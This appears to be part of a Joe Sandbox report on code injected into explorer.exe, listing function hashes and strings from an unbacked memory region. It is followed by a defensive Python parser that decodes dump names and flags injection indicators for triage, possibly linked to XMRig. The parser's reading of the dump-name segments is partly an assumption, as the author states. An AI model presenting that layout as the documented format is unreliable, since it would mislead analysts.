                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 13bd77a59d84c3d18cc472434e805f9f20d2871425d911662b8adabc6c57c377
                                  • Instruction ID: f2e244a023261fb47b0ceef9f124023e2e066d6d454fa5633a4557d0e7e4945b
                                  • Opcode Fuzzy Hash: 13bd77a59d84c3d18cc472434e805f9f20d2871425d911662b8adabc6c57c377
                                  • Instruction Fuzzy Hash: C5F0F960A1E95ADFEE98FB28845177C62D2FB88781F200474D40ED7AD6DD1DBC41AB60
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
                                  • Instruction ID: b30ad03eb57c6d154733b71ed188a380bfee214d8c1dab5099da4dde44ace39b
                                  • Opcode Fuzzy Hash: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
                                  • Instruction Fuzzy Hash: EDF0A02294E6C69FDB07627A6C600ACBFA6AE5229030A01E7D084C74A3E54D18958772
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 34844a89cb806d24f9792bf7bb52df2778b1672062c5b259c1361e1a1506e91d
                                  • Instruction ID: a1121465b5d745d8593d41346a9f8f8d61a0431a10c48f4a62c6089d19b228db
                                  • Opcode Fuzzy Hash: 34844a89cb806d24f9792bf7bb52df2778b1672062c5b259c1361e1a1506e91d
                                  • Instruction Fuzzy Hash: 9CF0A752D0EAC64FEB1762396D600B87F639E92190B4A01F7C084C70A7E80D18554332
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: J]G$0J]G$@J]G$PJ]G$`J]G$pJ]G
                                  • API String ID: 0-1338069578
                                  • Opcode ID: bc20893a6eba7ba0ce4393a625fb93dacec55a6152cd7cb6a025d37c9eca5af7
                                  • Instruction ID: b04d883d04121b38065a8259b1a43192a1375ecb1d510e6bbe73f348d198812b
                                  • Opcode Fuzzy Hash: bc20893a6eba7ba0ce4393a625fb93dacec55a6152cd7cb6a025d37c9eca5af7
                                  • Instruction Fuzzy Hash: E241E552E0E5C2DFFB19967C381107D2FA2EF5666072945FBD488CB8DBD81C9C0A83A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Xd]G$Xd]G$d]G$d]G
                                  • API String ID: 0-3376394805
                                  • Opcode ID: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
                                  • Instruction ID: c971c9d9c1186d56c679d81e3c4fe26056a05e646827f60c0f9df5aa49993f55
                                  • Opcode Fuzzy Hash: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
                                  • Instruction Fuzzy Hash: A811E792D0E5C2AFFE65957C38450BD1F92FF41AA472C45FBE0884B8DBE85C98074260
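Each block in this listing is one disassembled function from the same memory dump of process 11 (explorer.exe), and the "Source File" line carries the information that matters for triage: the region at 0x00007FF8476E0000 is "based on PE: false", i.e. code that is not backed by any loaded image, which fits the "Injects code into the Windows Explorer (explorer.exe)" signature in the overview. The following Python parser is an added example, not Joe Sandbox code: it reads entries in exactly this layout, decodes the dump name, cross-checks it against the snapshot file name, and flags the injection indicators. The sample input is two entries copied from the listing above. The meaning of the dump name segments is an assumption on my part (process index, phase, sequence number, base address, page protection, state, region type, reserved); the process index and phase are confirmed by the `hcaresult_11_2_...` snapshot name, and the protection and type segments are read as Win32 constants because 0x40 and 0x20000 match PAGE_EXECUTE_READWRITE and MEM_PRIVATE.

```python
import re
from typing import Dict, List, Tuple

# Documented Win32 memory constants.
PAGE_EXECUTE_MASK = 0x10 | 0x20 | 0x40 | 0x80  # PAGE_EXECUTE* family
PAGE_WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80    # PAGE_READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY
MEM_PRIVATE = 0x20000

# Assumed layout of the .sdmp name (segment meanings are an assumption, see lead-in).
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp, Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(?P<proc>\d+)_(?P<phase>\d+)_(?P<base>[0-9a-f]+)_(?P<image>.+)\.jbxd$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Constructed sample: two entries copied from the report listing above.
SAMPLE = """\
Memory Dump Source
• Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
• Instruction ID: b30ad03eb57c6d154733b71ed188a380bfee214d8c1dab5099da4dde44ace39b
• Opcode Fuzzy Hash: 8244057c62584574bfbb65c7a062ad2fa330e3a756da0f080998c1270de707e2
• Instruction Fuzzy Hash: EDF0A02294E6C69FDB07627A6C600ACBFA6AE5229030A01E7D084C74A3E54D18958772
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3368763105.00007FF8476E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00007FF8476E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
Similarity
• API ID:
• String ID: Xd]G$Xd]G$d]G$d]G
• API String ID: 0-3376394805
• Opcode ID: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
• Instruction ID: c971c9d9c1186d56c679d81e3c4fe26056a05e646827f60c0f9df5aa49993f55
• Opcode Fuzzy Hash: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
• Instruction Fuzzy Hash: A811E792D0E5C2AFFE65957C38450BD1F92FF41AA472C45FBE0884B8DBE85C98074260
"""


def parse_entries(text: str) -> List[Dict[str, str]]:
    """Split the listing into one dict of '• Key: Value' fields per 'Memory Dump Source' block."""
    entries: List[Dict[str, str]] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = {}
            entries.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            cur[m["key"].strip()] = m["val"].strip()
    return entries


def parse_source(entry: Dict[str, str]) -> Dict[str, object]:
    """Decode the .sdmp name; raises on an unexpected layout rather than guessing."""
    m = SDMP_RE.match(entry["Source File"])
    if not m:
        raise ValueError("unrecognised Source File: " + entry["Source File"])
    return {"process_index": int(m["proc"], 16), "phase": int(m["phase"], 16),
            "base": int(m["base"], 16), "protect": int(m["protect"], 16),
            "state": int(m["state"], 16), "type": int(m["type"], 16),
            "pe_backed": m["pe"] == "true"}


def parse_snapshot(entry: Dict[str, str]) -> Dict[str, object]:
    """Decode hcaresult_<proc>_<phase>_<base>_<image>.jbxd (the process image is only here)."""
    m = SNAPSHOT_RE.match(entry["Snapshot File"])
    if not m:
        raise ValueError("unrecognised Snapshot File: " + entry["Snapshot File"])
    return {"process_index": int(m["proc"]), "phase": int(m["phase"]),
            "base": int(m["base"], 16), "image": m["image"]}


def names_consistent(entry: Dict[str, str]) -> bool:
    """The dump name and snapshot name must describe the same process, phase and base."""
    s, n = parse_source(entry), parse_snapshot(entry)
    return (s["process_index"], s["phase"], s["base"]) == (n["process_index"], n["phase"], n["base"])


def injection_indicators(entry: Dict[str, str]) -> List[str]:
    """Why this region looks like injected code rather than a loaded module."""
    s = parse_source(entry)
    hits = []
    if not s["pe_backed"]:
        hits.append("not backed by a PE image")
    if s["protect"] & PAGE_EXECUTE_MASK and s["protect"] & PAGE_WRITE_MASK:
        hits.append("writable and executable protection 0x%X" % s["protect"])
    if s["type"] == MEM_PRIVATE:
        hits.append("MEM_PRIVATE region, not a mapped image")
    return hits


def summarize(text: str) -> Dict[Tuple[str, int], Dict[str, object]]:
    """Group functions by (process image, region base) and collect hashes for similarity lookups."""
    report: Dict[Tuple[str, int], Dict[str, object]] = {}
    for entry in parse_entries(text):
        key = (parse_snapshot(entry)["image"], parse_source(entry)["base"])
        rec = report.setdefault(key, {"functions": 0, "with_strings": 0,
                                      "instruction_hashes": [], "indicators": injection_indicators(entry)})
        rec["functions"] += 1
        rec["with_strings"] += bool(entry.get("String ID"))
        rec["instruction_hashes"].append(entry["Instruction Fuzzy Hash"])
    return report


if __name__ == "__main__":
    for (image, base), rec in summarize(SAMPLE).items():
        print("%s @ 0x%016X: %d functions, %d with strings" % (image, base, rec["functions"], rec["with_strings"]))
        for hit in rec["indicators"]:
            print("  -", hit)
```

Run over the full listing, every entry here collapses into a single region key (explorer, 0x00007FF8476E0000) with all three indicators set, and the collected Instruction Fuzzy Hash values are what you would feed to a function-similarity lookup against known XMRig builds. The Opcode ID and Opcode Fuzzy Hash fields are identical in every entry on this page, so the Instruction Fuzzy Hash is the one worth keeping.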